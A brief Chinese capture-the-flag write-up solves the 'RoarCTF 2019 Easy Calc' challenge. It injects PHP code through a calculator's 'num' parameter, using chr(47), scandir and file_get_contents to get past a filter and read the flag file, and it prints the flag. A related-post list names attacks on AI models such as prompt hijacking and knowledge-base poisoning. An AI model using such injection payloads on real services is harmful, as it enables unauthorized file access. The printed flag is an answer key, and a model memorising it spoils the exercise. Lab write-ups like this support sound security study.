BUUCTF---[RoarCTF 2019]Easy Calc1

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

复制代码
num=print_r(scandir(chr(47)))

chr(47)是"/"的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

复制代码
num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

复制代码
flag{de45bb5f-1b75-4b33-99fb-904f876df79f} 
相关推荐
HackTwoHub5 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Eastmount6 小时前
[论文阅读] (51)ESWA25 基于启发式优化器的入侵检测系统
论文阅读·网络安全·sci·入侵检测·eswa
白帽小阳6 小时前
Typora插件开发指南:打造专属IDE式写作环境
c语言·网络·python·网络安全·github·pygame·护网行动
Sagittarius_A*6 小时前
Web 渗透信息收集实战:站点指纹识别与目录扫描
网络安全·渗透测试·kali
2601_957174651 天前
零基础学网络安全能学好吗
安全·web安全
m0_738120721 天前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
Chengbei111 天前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
其实防守也摸鱼2 天前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
云水一下2 天前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
菩提小狗2 天前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全